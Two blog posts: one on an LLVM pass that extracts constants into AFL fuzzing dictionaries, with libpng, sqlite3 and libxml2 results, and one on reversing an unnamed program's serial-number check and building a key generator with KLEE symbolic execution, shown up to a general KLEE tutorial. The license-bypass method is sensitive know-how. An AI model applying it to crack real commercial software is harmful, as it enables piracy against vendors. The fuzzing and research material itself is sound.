section_cHRM="cHRM"
section_fRAc="fRAc"
section_gAMA="gAMA"
section_gIFg="gIFg"
section_gIFt="gIFt"
section_gIFx="gIFx"
section_hIST="hIST"
section_iCCP="iCCP"
section_iTXt="iTXt"
...

Some of those can be found in the function png_push_read_chunk in the file pngpread.c for example:

//png_push_read_chunk
#define png_IHDR PNG_U32( 73,  72,  68,  82)
// ...
if (chunk_name == png_IHDR)
{
  if (png_ptr->push_length != 13)
      png_error(png_ptr, "Invalid IHDR length");

  PNG_PUSH_SAVE_BUFFER_IF_FULL
  png_handle_IHDR(png_ptr, info_ptr, png_ptr->push_length);
}
else if (chunk_name == png_IEND)
{
  PNG_PUSH_SAVE_BUFFER_IF_FULL
  png_handle_IEND(png_ptr, info_ptr, png_ptr->push_length);

  png_ptr->process_mode = PNG_READ_DONE_MODE;
  png_push_have_end(png_ptr, info_ptr);
}
else if (chunk_name == png_PLTE)
{
  PNG_PUSH_SAVE_BUFFER_IF_FULL
  png_handle_PLTE(png_ptr, info_ptr, png_ptr->push_length);
}

In order to also grab those guys, I decided to add support for compare instructions with an integer immediate in one of the operands. Again, thanks to LLVM it is really easy to pull this off: we just need to find the llvm::ICmpInst instructions. The only thing to keep in mind is false positives. In order to lower the false positive rate, I have chosen to consider an integer immediate as a token only if it is fully ASCII (like the libpng tokens above).
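
Here is a sketch of what that handling might look like, living in the same instruction loop as the CallInst case above; dump_integer_token is the pass's helper (reused for switches below), while the ASCII filter is my own approximation of the check:

/* Handle compares against integer immediates */
else if(ICmpInst *ICI = dyn_cast<ICmpInst>(&I_)) {
  for(unsigned Idx = 0; Idx < 2; Idx++) {
    if(ConstantInt *CI = dyn_cast<ConstantInt>(ICI->getOperand(Idx)))
      dump_integer_token(CI);
  }
}

/* Inside dump_integer_token: keep the immediate only if every byte is
   printable ASCII - an assumed approximation of the real filter */
static bool is_full_ascii(uint64_t V, unsigned NBytes) {
  for(unsigned i = 0; i < NBytes; i++) {
    uint8_t c = (V >> (i * 8)) & 0xff;
    if(c < 0x20 || c > 0x7e)
      return false;
  }
  return true;
}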

We can even push it a bit further and handle switch statements via the same strategy. The only additional step is to retrieve every case from the switch statement: llvm::SwitchInst::cases.

/* Handle switch/case with integer immediates */
else if(SwitchInst *SI = dyn_cast<SwitchInst>(&I_)) {
  for(auto &CIT : SI->cases()) {

    ConstantInt *CI = CIT.getCaseValue();
    dump_integer_token(CI);
  }
}

Limitations

The main limitation is that, as you are supposed to run the pass as part of the compilation process, it will most likely end up compiling tests or utilities that the library ships with. This is annoying, as it may add some noise to your tokens - especially with utility programs. Those usually parse input arguments, and some use strcmp-like functions with hard-coded strings to do their parsing.

A partial solution (as in, it reduces the noise but does not remove it entirely) I have implemented is simply to not process any function called main. In most of the cases I have seen (the set of samples is pretty small, I won't lie >:]), this argument parsing is done in the main function, and it is very easy to skip it by blacklisting the function name as you can see below:

bool AFLTokenCap::runOnBasicBlock(BasicBlock &B) {
// [...]
  Function *F = B.getParent();
  m_FunctionName = F->hasName() ? F->getName().data() : "unknown";

  if(strcmp(m_FunctionName, "main") == 0)
    return false;

Another thing I wanted to experiment with, but did not, was to provide a regular-expression-like string (think "test/*") and not process any file/path matching it. You could easily blacklist a whole directory of tests this way.
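
For the record, a hedged sketch of that idea, using fnmatch(3) and a made-up AFL_TOKEN_BLACKLIST environment variable:

#include <cstdlib>
#include <fnmatch.h>

/* Skip any file whose source path matches the user-supplied glob */
static bool should_skip_file(const char *SourcePath) {
  const char *Pattern = getenv("AFL_TOKEN_BLACKLIST"); /* e.g. "test/*" */
  return Pattern && fnmatch(Pattern, SourcePath, 0) == 0;
}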

Demo

I have not spent much time trying it out on a lot of code bases (feel free to send me your feedback if you run it on yours though!), but here are some example results, with varying degrees of success... or not. Starting with libpng:

over@bubuntu:~/workz/lpng1625$ AFL_TOKEN_FILE=/tmp/png.dict make
cp scripts/pnglibconf.h.prebuilt pnglibconf.h
/home/over/workz/afl-2.35b/afl-clang-fast -c -I../zlib  -W -Wall -O3 -funroll-loops   -o png.o png.c
afl-clang-fast 2.35b by <[email protected]>
afl-llvm-tokencap-pass 2.35b by <[email protected]>
afl-llvm-pass 2.35b by <[email protected]>
[+] Instrumented 945 locations (non-hardened mode, ratio 100%).
[+] Found alphanum constant "acsp" in png.c/png_icc_check_header
[+] Call to memcmp with constant "\x00\x00\xf6\xd6\x00\x01\x00\x00\x00\x00\xd3" found in png.c/png_icc_check_header
[+] Found alphanum constant "RGB " in png.c/png_icc_check_header
[+] Found alphanum constant "GRAY" in png.c/png_icc_check_header
[+] Found alphanum constant "scnr" in png.c/png_icc_check_header
[+] Found alphanum constant "mntr" in png.c/png_icc_check_header
[+] Found alphanum constant "prtr" in png.c/png_icc_check_header
[+] Found alphanum constant "spac" in png.c/png_icc_check_header
[+] Found alphanum constant "abst" in png.c/png_icc_check_header
[+] Found alphanum constant "link" in png.c/png_icc_check_header
[+] Found alphanum constant "nmcl" in png.c/png_icc_check_header
[+] Found alphanum constant "XYZ " in png.c/png_icc_check_header
[+] Found alphanum constant "Lab " in png.c/png_icc_check_header
[...]

over@bubuntu:~/workz/lpng1625$ sort -u /tmp/png.dict
"abst"
"acsp"
"bKGD"
"cHRM"
"gAMA"
"GRAY"
"hIST"
"iCCP"
"IDAT"
"IEND"
"IHDR"
"iTXt"
"Lab "
"link"
"mntr"
"nmcl"
"oFFs"
"pCAL"
"pHYs"
"PLTE"
"prtr"
"RGB "
"sBIT"
"sCAL"
"scnr"
"spac"
"sPLT"
"sRGB"
"tEXt"
"tIME"
"tRNS"
"\x00\x00\xf6\xd6\x00\x01\x00\x00\x00\x00\xd3"
"XYZ "
"zTXt"

On sqlite3 (sqlite.dict):

over@bubuntu:~/workz/sqlite3$ AFL_TOKEN_FILE=/tmp/sqlite.dict /home/over/workz/afl-2.35b/afl-clang-fast stub.c sqlite3.c -lpthread -ldl -o a.out
[...]
afl-llvm-tokencap-pass 2.35b by <[email protected]>
afl-llvm-pass 2.35b by <[email protected]>
[+] Instrumented 47546 locations (non-hardened mode, ratio 100%).
[+] Call to strcmp with constant "unix-excl" found in sqlite3.c/unixOpen
[+] Call to memcmp with constant "SQLite format 3" found in sqlite3.c/sqlite3BtreeBeginTrans
[+] Call to memcmp with constant "@  " found in sqlite3.c/sqlite3BtreeBeginTrans
[+] Call to strcmp with constant "BINARY" found in sqlite3.c/sqlite3_step
[+] Call to strcmp with constant ":memory:" found in sqlite3.c/sqlite3BtreeOpen
[+] Call to strcmp with constant "nolock" found in sqlite3.c/sqlite3BtreeOpen
[+] Call to strcmp with constant "immutable" found in sqlite3.c/sqlite3BtreeOpen
[+] Call to memcmp with constant "\xd9\xd5\x05\xf9 \xa1c" found in sqlite3.c/syncJournal
[+] Found alphanum constant "char" in sqlite3.c/yy_reduce
[+] Found alphanum constant "clob" in sqlite3.c/yy_reduce
[+] Found alphanum constant "text" in sqlite3.c/yy_reduce
[+] Found alphanum constant "blob" in sqlite3.c/yy_reduce
[+] Found alphanum constant "real" in sqlite3.c/yy_reduce
[+] Found alphanum constant "floa" in sqlite3.c/yy_reduce
[+] Found alphanum constant "doub" in sqlite3.c/yy_reduce
[+] Call to strcmp with constant "sqlite_sequence" found in sqlite3.c/sqlite3StartTable
[+] Call to memcmp with constant "file:" found in sqlite3.c/sqlite3ParseUri
[+] Call to memcmp with constant "localhost" found in sqlite3.c/sqlite3ParseUri
[+] Call to memcmp with constant "vfs" found in sqlite3.c/sqlite3ParseUri
[+] Call to memcmp with constant "cache" found in sqlite3.c/sqlite3ParseUri
[+] Call to memcmp with constant "mode" found in sqlite3.c/sqlite3ParseUri
[+] Call to strcmp with constant "localtime" found in sqlite3.c/isDate
[+] Call to strcmp with constant "unixepoch" found in sqlite3.c/isDate
[+] Call to strncmp with constant "weekday " found in sqlite3.c/isDate
[+] Call to strncmp with constant "start of " found in sqlite3.c/isDate
[+] Call to strcmp with constant "month" found in sqlite3.c/isDate
[+] Call to strcmp with constant "year" found in sqlite3.c/isDate
[+] Call to strcmp with constant "hour" found in sqlite3.c/isDate
[+] Call to strcmp with constant "minute" found in sqlite3.c/isDate
[+] Call to strcmp with constant "second" found in sqlite3.c/isDate

over@bubuntu:~/workz/sqlite3$ sort -u /tmp/sqlite.dict
"@  "
"BINARY"
"blob"
"cache"
"char"
"clob"
"doub"
"file:"
"floa"
"hour"
"immutable"
"localhost"
"localtime"
":memory:"
"minute"
"mode"
"month"
"nolock"
"real"
"second"
"SQLite format 3"
"sqlite_sequence"
"start of "
"text"
"unixepoch"
"unix-excl"
"vfs"
"weekday "
"\xd9\xd5\x05\xf9 \xa1c"
"year"

On libxml2 (here is a library with a lot of test cases / utilities that raise the noise ratio in the extracted tokens - cf the xmlShell* commands for example):

over@bubuntu:~/workz/libxml2$ CC=/home/over/workz/afl-2.35b/afl-clang-fast ./autogen.sh && AFL_TOKEN_FILE=/tmp/xml.dict make
[...]
afl-clang-fast 2.35b by <[email protected]>
afl-llvm-tokencap-pass 2.35b by <[email protected]>
afl-llvm-pass 2.35b by <[email protected]>
[+] Instrumented 668 locations (non-hardened mode, ratio 100%).
[+] Call to strcmp with constant "UTF-8" found in encoding.c/xmlParseCharEncoding__internal_alias
[+] Call to strcmp with constant "UTF8" found in encoding.c/xmlParseCharEncoding__internal_alias
[+] Call to strcmp with constant "UTF-16" found in encoding.c/xmlParseCharEncoding__internal_alias
[+] Call to strcmp with constant "UTF16" found in encoding.c/xmlParseCharEncoding__internal_alias
[+] Call to strcmp with constant "ISO-10646-UCS-2" found in encoding.c/xmlParseCharEncoding__internal_alias
[+] Call to strcmp with constant "UCS-2" found in encoding.c/xmlParseCharEncoding__internal_alias
[+] Call to strcmp with constant "UCS2" found in encoding.c/xmlParseCharEncoding__internal_alias
[+] Call to strcmp with constant "ISO-10646-UCS-4" found in encoding.c/xmlParseCharEncoding__internal_alias
[+] Call to strcmp with constant "UCS-4" found in encoding.c/xmlParseCharEncoding__internal_alias
[+] Call to strcmp with constant "UCS4" found in encoding.c/xmlParseCharEncoding__internal_alias
[+] Call to strcmp with constant "ISO-8859-1" found in encoding.c/xmlParseCharEncoding__internal_alias
[+] Call to strcmp with constant "ISO-LATIN-1" found in encoding.c/xmlParseCharEncoding__internal_alias
[+] Call to strcmp with constant "ISO LATIN 1" found in encoding.c/xmlParseCharEncoding__internal_alias
[+] Call to strcmp with constant "ISO-8859-2" found in encoding.c/xmlParseCharEncoding__internal_alias
[+] Call to strcmp with constant "ISO-LATIN-2" found in encoding.c/xmlParseCharEncoding__internal_alias
[+] Call to strcmp with constant "ISO LATIN 2" found in encoding.c/xmlParseCharEncoding__internal_alias
[+] Call to strcmp with constant "ISO-8859-3" found in encoding.c/xmlParseCharEncoding__internal_alias
[+] Call to strcmp with constant "ISO-8859-4" found in encoding.c/xmlParseCharEncoding__internal_alias
[+] Call to strcmp with constant "ISO-8859-5" found in encoding.c/xmlParseCharEncoding__internal_alias
[+] Call to strcmp with constant "ISO-8859-6" found in encoding.c/xmlParseCharEncoding__internal_alias
[+] Call to strcmp with constant "ISO-8859-7" found in encoding.c/xmlParseCharEncoding__internal_alias
[+] Call to strcmp with constant "ISO-8859-8" found in encoding.c/xmlParseCharEncoding__internal_alias
[+] Call to strcmp with constant "ISO-8859-9" found in encoding.c/xmlParseCharEncoding__internal_alias
[+] Call to strcmp with constant "ISO-2022-JP" found in encoding.c/xmlParseCharEncoding__internal_alias
[+] Call to strcmp with constant "SHIFT_JIS" found in encoding.c/xmlParseCharEncoding__internal_alias
[+] Call to strcmp with constant "EUC-JP" found in encoding.c/xmlParseCharEncoding__internal_alias
[...]
afl-clang-fast 2.35b by <[email protected]>
afl-llvm-tokencap-pass 2.35b by <[email protected]>
afl-llvm-pass 2.35b by <[email protected]>
[+] Instrumented 1214 locations (non-hardened mode, ratio 100%).
[+] Call to strcmp with constant "exit" found in debugXML.c/xmlShell__internal_alias
[+] Call to strcmp with constant "quit" found in debugXML.c/xmlShell__internal_alias
[+] Call to strcmp with constant "help" found in debugXML.c/xmlShell__internal_alias
[+] Call to strcmp with constant "validate" found in debugXML.c/xmlShell__internal_alias
[+] Call to strcmp with constant "load" found in debugXML.c/xmlShell__internal_alias
[+] Call to strcmp with constant "relaxng" found in debugXML.c/xmlShell__internal_alias
[+] Call to strcmp with constant "save" found in debugXML.c/xmlShell__internal_alias
[+] Call to strcmp with constant "write" found in debugXML.c/xmlShell__internal_alias
[+] Call to strcmp with constant "grep" found in debugXML.c/xmlShell__internal_alias
[+] Call to strcmp with constant "free" found in debugXML.c/xmlShell__internal_alias
[+] Call to strcmp with constant "base" found in debugXML.c/xmlShell__internal_alias
[+] Call to strcmp with constant "setns" found in debugXML.c/xmlShell__internal_alias
[+] Call to strcmp with constant "setrootns" found in debugXML.c/xmlShell__internal_alias
[+] Call to strcmp with constant "xpath" found in debugXML.c/xmlShell__internal_alias
[+] Call to strcmp with constant "setbase" found in debugXML.c/xmlShell__internal_alias
[+] Call to strcmp with constant "whereis" found in debugXML.c/xmlShell__internal_alias
[...]

over@bubuntu:~/workz/libxml2$ sort -u /tmp/xml.dict
"307377"
"base"
"c14n"
"catalog"
"<![CDATA["
"chvalid"
"crazy:"
"debugXML"
"dict"
"disable SAX"
"document"
"encoding"
"entities"
"EUC-JP"
"exit"
"fetch external entities"
"file:///etc/xml/catalog"
"free"
"ftp://"
"gather line info"
"grep"
"hash"
"help"
"HTMLparser"
"HTMLtree"
"http"
"HTTP/"
"huge:"
"huge:attrNode"
"huge:commentNode"
"huge:piNode"
"huge:textNode"
"is html"
"ISO-10646-UCS-2"
"ISO-10646-UCS-4"
"ISO-2022-JP"
"ISO-8859-1"
"ISO-8859-2"
"ISO-8859-3"
"ISO-8859-4"
"ISO-8859-5"
"ISO-8859-6"
"ISO-8859-7"
"ISO-8859-8"
"ISO-8859-9"
"ISO LATIN 1"
"ISO-LATIN-1"
"ISO LATIN 2"
"ISO-LATIN-2"
"is standalone"
"is valid"
"is well formed"
"keep blanks"
"list"
"load"
"nanoftp"
"nanohttp"
"parser"
"parserInternals"
"pattern"
"quit"
"relaxng"
"save"
"SAX2"
"SAX block"
"SAX function attributeDecl"
"SAX function cdataBlock"
"SAX function characters"
"SAX function comment"
"SAX function elementDecl"
"SAX function endDocument"
"SAX function endElement"
"SAX function entityDecl"
"SAX function error"
"SAX function externalSubset"
"SAX function fatalError"
"SAX function getEntity"
"SAX function getParameterEntity"
"SAX function hasExternalSubset"
"SAX function hasInternalSubset"
"SAX function ignorableWhitespace"
"SAX function internalSubset"
"SAX function isStandalone"
"SAX function notationDecl"
"SAX function reference"
"SAX function resolveEntity"
"SAX function setDocumentLocator"
"SAX function startDocument"
"SAX function startElement"
"SAX function unparsedEntityDecl"
"SAX function warning"
"schemasInternals"
"schematron"
"setbase"
"setns"
"setrootns"
"SHIFT_JIS"
"sql:"
"substitute entities"
"test/threads/invalid.xml"
"total"
"tree"
"tutor10_1"
"tutor10_2"
"tutor3_2"
"tutor8_2"
"UCS-2"
"UCS2"
"UCS-4"
"UCS4"
"user data"
"UTF-16"
"UTF16"
"UTF-16BE"
"UTF-16LE"
"UTF-8"
"UTF8"
"valid"
"validate"
"whereis"
"write"
"xinclude"
"xmlautomata"
"xmlerror"
"xmlIO"
"xmlmodule"
"xmlreader"
"xmlregexp"
"xmlsave"
"xmlschemas"
"xmlschemastypes"
"xmlstring"
"xmlunicode"
"xmlwriter"
"xpath"
"xpathInternals"
"xpointer"

Performance-wise, here is what we are looking at on libpng (+0.283s):

over@bubuntu:~/workz/lpng1625$ make clean && time AFL_TOKEN_FILE=/tmp/png.dict make && make clean && time make
[...]
real    0m12.320s
user    0m11.732s
sys     0m0.360s
[...]
real    0m12.037s
user    0m11.436s
sys     0m0.384s

Last words

I am very interested in hearing from you if you give this analysis pass a shot on your code base and/or in your fuzzing sessions, so feel free to hit me up! Also, note that libFuzzer supports the same feature and is compatible with afl's dictionary syntax - so you get it for free!
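
For example, assuming a libFuzzer target binary, reusing the generated file is a one-liner:

$ ./fuzz_target -dict=png.dict corpus/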

Here is a list of interesting articles talking about transformation/analysis passes that I recommend you read if you want to know more:

Special shout-outs to my proofreaders: yrp, mongo & jonathan.

Go hax clang and/or LLVM!

Keygenning with KLEE

Introduction

In the past weeks I enjoyed reversing a piece of software (don't ask me the name) to study how its serial numbers are validated. The story the user has to follow is pretty common: download the trial, pay, get the serial number, and use it in the annoying nag screen to get the fully functional version of the software.

Since my purpose is not to damage the company developing the software, I will not mention the name of the software, nor will I publish the final key generator in binary form or its source code. My goal is instead to study a real case of serial number validation and to highlight its weaknesses.

In this post we are going to take a look at the steps I followed to reverse the serial validation process and to build a key generator using the KLEE symbolic virtual machine. We are not going to follow all the details of the reversing part, since you cannot reproduce them on your own. We will concentrate on the key generator itself: that is the most interesting part.

Getting acquainted

The software is an x86 executable with no anti-debugging or anti-reversing techniques. When started, it presents a nag screen asking for a registration composed of a customer number, a serial number and a mail address. This is fairly common in software.

Tools of the trade

The first steps in the reversing are devoted to finding all the interesting functions to analyze. To do this I used IDA Pro with the Hex-Rays decompiler, and the WinDbg debugger. For the last part I used the KLEE symbolic virtual machine under Linux, the gcc compiler and some bash scripting. The actual key generator was a simple WPF application.

Let me skip the first part, since it is not very interesting. You can find many other articles on the web that guide you through basic reversing techniques with IDA Pro. I only kept some simple rules in mind while going forward:

  • always rename functions that use interesting data, even if you don't know precisely what they do. A name like license_validation_unknown_8 is always better than a default like sub_46fa39;
  • similarly, rename data whenever you find it interesting;
  • change data types when you are sure they are wrong: use structs and arrays in case of aggregates;
  • follow cross references of data and functions to expand your collection;
  • validate your beliefs with the debugger if possible. For example, if you think a variable contains the serial, break with the debugger and see if it is the case.

Big picture

When I collected the most interesting functions, I tried to understand the high level flow and the simpler functions. Here are the main variables and types used in the validation process. As a note for the reader: most of them have been purged of uninteresting details, for the sake of simplicity.

enum {
    ERROR,
    STANDARD,
    PRO
} license_type = ERROR;

Here we have a global variable providing the type of the license, used to enable and disable features of the application.

enum result_t {
    INVALID,
    VALID,
    VALID_IF_LAST_VERSION
};

This is a convenient enum used as the result of the validation. The INVALID and VALID values are pretty self-explanatory. VALID_IF_LAST_VERSION tells us that this registration is valid only if the current software version is the latest available. The reason for this strange possibility will become clear shortly.

#define HEADER_SIZE 8192
struct {
    int header[HEADER_SIZE];
    int data[1000000];
} mail_digest_table;

This is a data structure containing digests of the mail addresses of known registered users. It is a pretty big file embedded in the executable itself. During startup, a resource is extracted into a temporary file and its content copied into this struct. Each element of the header vector is an offset pointing inside the data vector.

Here we have a pseudo-C code for the registration check, that uses data types and variables explained above:

enum result_t check_registration(int serial, int customer_num, const char* mail) {
    // validate serial number
    license_type = get_license_type(serial);
    if (license_type == ERROR)
        return INVALID;

    // validate customer number
    int expected_customer = compute_customer_number(serial, mail);
    if (expected_customer != customer_num)
        return INVALID;

    // validate w.r.t. known registrations
    int index = get_index_in_mail_table(serial);
    if (index > HEADER_SIZE)
        return VALID_IF_LAST_VERSION;
    int mail_digest = compute_mail_digest(mail);
    for (int i = 0; i < 3; ++i) {
        if (mail_digest_table.data[index + i] == mail_digest)
            return VALID;
    }
    return INVALID;
}

The validation is divided in three main parts:

  • serial number must be valid by itself;
  • serial number, combined with mail address has to correspond to the actual customer number;
  • there has to be a correspondence between serial number and mail address, stored in a static table in the binary.

The last point is a little bit unusual. Let me restate it this way: whenever a customer buys the software, the customer table gets updated with their data and becomes available in the next version of the software (because it is embedded in the binary and not downloaded through the internet). This explains the VALID_IF_LAST_VERSION check: if you buy the software today, the current version does not contain your data. You are still allowed to get a "pro" version until a new version is released. At that moment you are forced to update to the new version, so the software can verify your registration against the updated table. Here is pseudo-code for that check:

switch (check_registration(serial, customer, mail)) {
case VALID:
    // the registration is OK! activate functionalities
    activate_pro_functionality();
    break;
case VALID_IF_LAST_VERSION:
    {
        // check if the current version is the last, by
        // using the internet.
        int current_version = get_current_version();
        int last_version = get_last_version();
        if (current_version == last_version)
            // OK for now: a new version is not available
            activate_pro_functionality();
        else
            // else, force the user to download the new version
            // before proceed
            ask_download();
    }
    break;
case INVALID:
    // registration is not valid
    handle_invalid_registration();
    break;
}

The version check is done by making an HTTP request to a specific URL that returns a page containing only the latest version number of the software. Don't ask me why the protection is not completely server-side but involves static tables, version checks and things like that. I don't know!

Anyway, this is the big picture of the registration validation functions, and it is pretty boring. Let's move on to the interesting part. You may have noticed that I provided code for the main procedure, but not for helper functions like get_license_type, compute_customer_number, and so on. This is because I did not have to reverse them. They contain a lot of arithmetical and logical operations on the registration data, and they are very difficult to understand. The good news is that we do not have to understand them; we only need to reverse them!

Symbolic execution

Symbolic execution is a way to execute programs using symbolic variables instead of concrete values. A symbolic variable is used whenever a value can be controlled by user input (this can be done by hand or determined using taint analysis), and could come from a file, standard input, a network stream, etc. Symbolic execution translates the program's semantics into a logical formula, and each instruction causes that formula to be updated. By solving the formula for one path, we get concrete values for the variables; if those values are fed to the program, the execution reaches that program point. Dynamic Symbolic Execution (DSE) builds the logical formula at runtime, step by step, following one path at a time. When a branch of the program is reached during the execution, the engine transforms the condition into arithmetic constraints. It then chooses the T (true) or F (false) branch and updates the formula with this new constraint (or its negation). At the end of a path, the engine can backtrack and select another path to execute. For example:

int v1 = SymVar_1, v2 = SymVar_2; // symbolic variables
if (v1 > 0)
    v2 = 0;
if (v2 == 0 && v1 <= 0)
    error();

We want to check if error is reachable, using symbolic variables SymVar_1 and SymVar_2 assigned to the program's variables v1 and v2. At line 2 we have the condition v1 > 0, so the symbolic engine adds the constraint SymVar_1 > 0 for the true branch or, conversely, SymVar_1 <= 0 for the false branch. It then continues the execution with the first constraint. Whenever a new path condition is reached, new constraints are added to the symbolic state, until the formula is no longer satisfiable. In that case, the engine backtracks and replaces some constraints with their negation, in order to reach other code paths. The execution engine tries to cover all code paths by solving those constraints and their negations, and for each portion of the code reached, it outputs a test case covering that part of the program, providing concrete values for the input variables. In our example, the engine continues the execution and finds the condition v2 == 0 && v1 <= 0 at line 4. On this path v2 was overwritten with 0, so v2 == 0 holds trivially and the path formula reduces to SymVar_1 > 0 && SymVar_1 <= 0, which is not satisfiable. The symbolic engine therefore emits values satisfying the formula collected so far (SymVar_1 > 0), for example SymVar_1 = 1 and some random value for SymVar_2. The engine then backtracks to the first branch and uses the negation of its constraint, SymVar_1 <= 0; here v2 keeps the value SymVar_2, so taking the true branch at line 4 adds SymVar_2 == 0 && SymVar_1 <= 0. The resulting formula, SymVar_1 <= 0 && SymVar_2 == 0, is satisfiable with SymVar_1 = -1 and SymVar_2 = 0, and reaches error(). Our symbolic execution engine can thus output the following test cases:

  • v1 = 1;
  • v1 = -1, v2 = 0.

Those test cases are enough to cover all the paths of the program.

This approach is useful for testing because it helps generate test cases. It is often effective, and it does not waste the computational power of your brain. You know... tests are very difficult to do effectively, and brain power is such a scarce resource!

I don't want to elaborate too much on this topic because it is way too big to fit in this post. Moreover, we are not going to use symbolic execution engines for testing purpose. This is just because we don't like to use things in the way they are intended :)

However, I will point you to some good references in the last section. Here I can list a series of common strengths and weaknesses of symbolic execution, just to give you a little bit of background:

Strengths:

  • when a test case fails, the program is proven to be incorrect;
  • automatic test cases catch errors that are often overlooked in manually written test cases (this is from the KLEE paper);
  • when it works it's cool :) (and this is from Jérémy);

Weaknesses:

  • when no tests fail we are not sure everything is correct, because no proof of correctness is given; static analysis can do that when it works (and often it does not!);
  • covering all the paths is not enough, because a variable can hold different values in one path and only some of them cause a bug;
  • complete coverage for non trivial programs is often impossible, due to path explosion or constraint solver timeout;
  • scaling is difficult, and execution time of the engine can suffer;
  • undefined behavior of CPU could lead to unexpected results;
  • ... and maybe there are a lot more remarks to add.

KLEE

KLEE is a great example of a symbolic execution engine. It operates on LLVM bitcode, and it is used for software verification purposes. KLEE is capable of automatically generating test cases achieving high code coverage. KLEE is also able to find memory errors, such as out-of-bounds array accesses, and many other common errors. To do that, it needs an LLVM bitcode version of the program, symbolic variables and (optionally) assertions. I have also prepared a Docker image with clang and klee already configured and ready to use, so you have no excuses not to try it out! Take this example function:

#define FALSE 0
#define TRUE 1
typedef int BOOL;

BOOL check_arg(int a) {
    if (a > 10)
        return FALSE;
    else if (a <= 10)
        return TRUE;
    return FALSE; // not reachable
}

This is a silly example, I know, but let's pretend we want to verify this function with this main:

#include <assert.h>
#include <klee/klee.h>

int main() {
    int input;
    klee_make_symbolic(&input, sizeof(int), "input");
    return check_arg(input);
}

In main we have a symbolic variable used as input for the function to be tested. We can also modify it to include an assertion:

BOOL check_arg(int a) {
    if (a > 10)
        return FALSE;
    else if (a <= 10)
        return TRUE;
    klee_assert(FALSE);
    return FALSE; // not reachable
}

We can now use clang to compile the program to LLVM bitcode and run the test generation with the klee command:

clang -emit-llvm -g -o test.ll -c test.c
klee test.ll

We get this output:

KLEE: output directory is "/work/klee-out-0"

KLEE: done: total instructions = 26
KLEE: done: completed paths = 2
KLEE: done: generated tests = 2

KLEE will generate test cases for the input variable, trying to cover all the possible execution paths and to make the provided assertions (if any) fail. In this case we have two execution paths and two generated test cases covering them. Test cases are in the output directory (in this case /work/klee-out-0). The symlink klee-last is also provided for convenience, pointing to the last output directory. Inside that directory a bunch of files are created, including the two test cases named test000001.ktest and test000002.ktest. These are binary files which can be examined with the ktest-tool utility. Let's try it:

$ ktest-tool --write-ints klee-last/test000001.ktest 
ktest file : 'klee-last/test000001.ktest'
args       : ['test.ll']
num objects: 1
object    0: name: 'input'
object    0: size: 4
object    0: data: 2147483647

And the second one:

$ ktest-tool --write-ints klee-last/test000002.ktest 
...
object    0: data: 0

In these test files, KLEE reports the command line arguments and the symbolic objects, along with their size and the value provided for the test. To cover the whole program, we need the input variable to take one value greater than 10 and one less than or equal to 10. You can see that this is the case: in the first test case the value 2147483647 is used, covering the first branch, while 0 is provided in the second, covering the other branch.

So far, so good. But what if we change the function in this way?

BOOL check_arg(int a) {
    if (a > 10)
        return FALSE;
    else if (a < 10)    // instead of <=
        return TRUE;
    klee_assert(FALSE);
    return FALSE;       // now reachable
}

We get this output:

$ klee test.ll 
KLEE: output directory is "/work/klee-out-2"
KLEE: ERROR: /work/test.c:9: ASSERTION FAIL: 0
KLEE: NOTE: now ignoring this error at this location

KLEE: done: total instructions = 27
KLEE: done: completed paths = 3
KLEE: done: generated tests = 3

And this is the klee-last directory contents:

$ ls klee-last/
assembly.ll   run.istats        test000002.assert.err  test000003.ktest
info          run.stats         test000002.ktest       warnings.txt
messages.txt  test000001.ktest  test000002.pc

Note the test000002.assert.err file. If we examine its corresponding test file, we have:

$ ktest-tool --write-ints klee-last/test000002.ktest 
ktest file : 'klee-last/test000002.ktest'
...
object    0: data: 10

As expected, the assertion fails when the input value is 10. So, as we now have three execution paths, we also have three test cases, and the whole program gets covered. KLEE also provides the possibility to replay the tests against the real program, but we are not interested in that now. You can see a usage example in this KLEE tutorial.

KLEE's ability to find execution paths through an application is very good. According to the OSDI 2008 paper, KLEE has been successfully used to test all 89 stand-alone programs in GNU COREUTILS and the equivalent busybox port, finding previously undiscovered bugs, errors and inconsistencies. The achieved code coverage was more than 90% per tool. Pretty awesome!

But, you may ask: who cares? You will see in a moment.

KLEE to reverse a function

As we have a powerful tool to find execution paths, we can use it to find the path we are interested in. As shown in Feliam's nice symbolic maze post, we can use KLEE to solve a maze. The idea is simple but very powerful: flag the portion of code you are interested in with a klee_assert(0) call, causing KLEE to produce the test case able to reach that point. In the maze example, this is as simple as replacing a read call with klee_make_symbolic and the printf("You win!\n") with the already mentioned klee_assert(0). Test cases triggering this assertion are the ones solving the maze!

For a concrete example, let's suppose we have this function:

int magic_computation(int input) {
    for (int i = 0; i < 32; ++i)
        input ^= 1 << i;
    return input;
}

And we want to know for what input we get the output 253. A main that tests this could be:

int main(int argc, char* argv[]) {
    int input = atoi(argv[1]);
    int output = magic_computation(input);
    if (output == 253)
        printf("You win!\n");
    else
        printf("You lose\n");
    return 0;
}

KLEE can resolve this problem for us, if we provide symbolic inputs and actually an assert to trigger:

int main(int argc, char* argv[]) {
    int input, result;
    klee_make_symbolic(&input, sizeof(int), "input");
    result = magic_computation(input);
    if (result == 253)
        klee_assert(0);
    return 0;
}

Run KLEE and print the result:

$ clang -emit-llvm -g -o magic.ll -c magic.c
$ klee magic.ll
$ ktest-tool --write-ints klee-last/test000001.ktest
ktest file : 'klee-last/test000001.ktest'
args       : ['magic.ll']
num objects: 1
object    0: name: 'input'
object    0: size: 4
object    0: data: -254

The answer is -254. Let's test it:

$ gcc magic.c
$ ./a.out -254
You win!

Yes!

KLEE, libc and command line arguments

Not all functions are this simple. At the very least we will have calls to the C standard library, such as strlen, atoi, and friends. We cannot link our test code against the system C library, as it is not inspectable by KLEE. For example:

int main(int argc, char* argv[]) {
    int input = atoi(argv[1]);
    return input;
}

If we run it with KLEE we get this error:

$ clang -emit-llvm -g -o atoi.ll -c atoi.c
$ klee atoi.ll 
KLEE: output directory is "/work/klee-out-4"
KLEE: WARNING: undefined reference to function: atoi
KLEE: WARNING ONCE: calling external: atoi(0)
KLEE: ERROR: /work/atoi.c:5: failed external call: atoi
KLEE: NOTE: now ignoring this error at this location
...

To fix this we can use the KLEE uClibc and POSIX runtime. Taken from the help:

"If we were running a normal native application, it would have been linked with the C library, but in this case KLEE is running the LLVM bitcode file directly. In order for KLEE to work effectively, it needs to have definitions for all the external functions the program may call. Similarly, a native application would be running on top of an operating system that provides lower level facilities like write(), which the C library uses in its implementation. As before, KLEE needs definitions for these functions in order to fully understand the program. We provide a POSIX runtime which is designed to work with KLEE and the uClibc library to provide the majority of operating system facilities used by command line applications".

Let's try to use these facilities to test our atoi function:

$ klee --optimize --libc=uclibc --posix-runtime atoi.ll --sym-args 0 1 3
